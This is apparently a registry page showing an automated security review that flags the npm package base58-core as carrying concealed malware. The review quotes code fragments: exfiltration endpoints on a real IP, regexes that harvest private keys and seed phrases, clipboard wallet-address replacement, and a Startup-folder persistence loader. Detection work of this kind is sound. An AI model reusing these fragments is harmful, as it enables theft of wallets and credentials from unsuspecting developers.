registry  /  base58-core  /  1.0.12

base58-core@1.0.12

Fast, tree-shakeable Base58 encoder/decoder with TypeScript support

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The package carries a hidden crypto-clipboard hijacker, host/profile detector, exfiltration client, and persistence writer in both runtime entrypoints. Due to the activation logic, the malicious routine does not appear to become active during normal import.

Static reason
High-risk behavior combination matched malicious policy.; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
Importing dist/index.cjs or dist/index.js evaluates _checkActivation; payload activation appears blocked by its own delay/flag logic.
Impact
If activated or fixed, it would steal clipboard secrets, replace wallet addresses, report local wallet/browser/SSH/npm/env indicators, and persist via shell rc or Startup folder.
Mechanism
inert staged clipboard hijacker with credential/environment discovery, exfiltration, and persistence code
Attack narrative
The Base58 API is bundled with concealed malware code that can scan clipboard contents for crypto addresses and private-key-like values, exfiltrate captures and host discovery data, and install shell/Startup persistence. The activation gate appears defective, making the payload staged/inert in this inspected build rather than reliably executing on import.
Rationale
Source inspection confirms intentionally malicious payload code unrelated to the advertised encoder, but the observed activation path is internally broken. Treat as an inert staged payload carrier rather than confirmed currently executing malware.
Evidence
package.jsondist/index.cjsdist/index.jsREADME.mddist/index.d.ts/tmp/.base58_detection_sent~/.npmrc~/.env.env.env.local.env.production~/.bashrc~/.zshrc~/.profile~/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/base58-runtime.js
Network endpoints2
2.27.62.51:8080/api/health2.27.62.51:8081/api/health

Decision evidence

public snapshot
AI called this Suspicious at 93.0% confidence as Malware with low false-positive risk.
Evidence for warning
  • dist/index.cjs and dist/index.js contain hidden clipboard wallet-address replacement logic.
  • Code defines exfiltration to http://2.27.62.51:8080/api/health and :8081/api/health.
  • Detection code reads wallet/browser/Telegram/SSH/.npmrc/.env indicators from user home and cwd.
  • Persistence code appends shell rc hooks or writes a Windows Startup loader.
  • The dangerous block is hidden in package entrypoints, unrelated to Base58 encoding.
Evidence against
  • package.json has no install/postinstall hook; only prepublishOnly build script.
  • Activation is effectively inert: INSTALL_TIME is set at module load, _checkActivation runs immediately before the 72h delay can pass, and _internal.activate sets activated before calling _checkActivation.
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsFilesystemNetworkShell
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 40.9 KB of source, external domains: 2.27.62.51

Source & flagged code

8 flagged · loading source
dist/index.jsView file
103const ACTIVATION_DELAY = 72 * 60 * 60 * 1000; L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health'; L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health'; ... L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' }, L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' }, L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' }, ... L127: ...data, L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown', L129: platform: process.platform || 'unknown', ... L140: headers: { 'Content-Type': 'application/json' }, L141: body: payload, L142: signal: controller.signal,
Critical
Clipboard Crypto Hijack

Source reads and rewrites clipboard contents matching cryptocurrency wallet addresses.

dist/index.jsView on unpkg · L103
533package = base58-core; repositoryIdentity = core; dependency = base58-core L533: try { L534: fs.writeFileSync(t, '// runtime loader\ntry { require("base58-core")._internal.activate(); } catch(e) {}'); L535: }
High
Copied Package Dependency Bridge

Package metadata claims a different repository identity while copied source loads a runtime dependency bridge.

dist/index.jsView on unpkg · L533
matchType = normalized_sha256 matchedPackage = base58-core@1.0.11 matchedPath = dist/index.js matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.11 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.jsView on unpkg
11try { L12: const nodeCrypto = require('crypto'); L13: return new Uint8Array(nodeCrypto.createHash('sha256').update(data).digest());
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/index.jsView on unpkg · L11
103const ACTIVATION_DELAY = 72 * 60 * 60 * 1000; L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health'; L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health'; ... L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' }, L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' }, L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' }, ... L127: ...data, L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown', L129: platform: process.platform || 'unknown', ... L140: headers: { 'Content-Type': 'application/json' }, L141: body: payload, L142: signal: controller.signal,
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

dist/index.jsView on unpkg · L103
dist/index.cjsView file
Trigger-reachable chain: manifest.main -> dist/index.cjs Reachable file contains a blocking source-risk pattern.
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

dist/index.cjsView on unpkg
matchType = normalized_sha256 matchedPackage = base58-core@1.0.11 matchedPath = dist/index.cjs matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.11 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.cjsView on unpkg
matchType = malicious_source_fingerprint_signature signature = e7d654f5e60435c0 signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = base58-core@1.0.11 matchedPath = dist/index.cjs matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.11 similarity = 1.000 shingleOverlap = 2 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

dist/index.cjsView on unpkg

Findings

2 Critical4 High5 Medium5 Low
CriticalClipboard Crypto Hijackdist/index.js
CriticalTrigger Reachable Dangerous Capabilitydist/index.cjs
HighCopied Package Dependency Bridgedist/index.js
HighKnown Malware Source Similaritydist/index.cjs
HighKnown Malware Source Similaritydist/index.js
HighKnown Malware Source Fingerprint Signaturedist/index.cjs
MediumDynamic Requiredist/index.js
MediumNetwork
MediumEnvironment Vars
MediumInstall Persistencedist/index.js
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings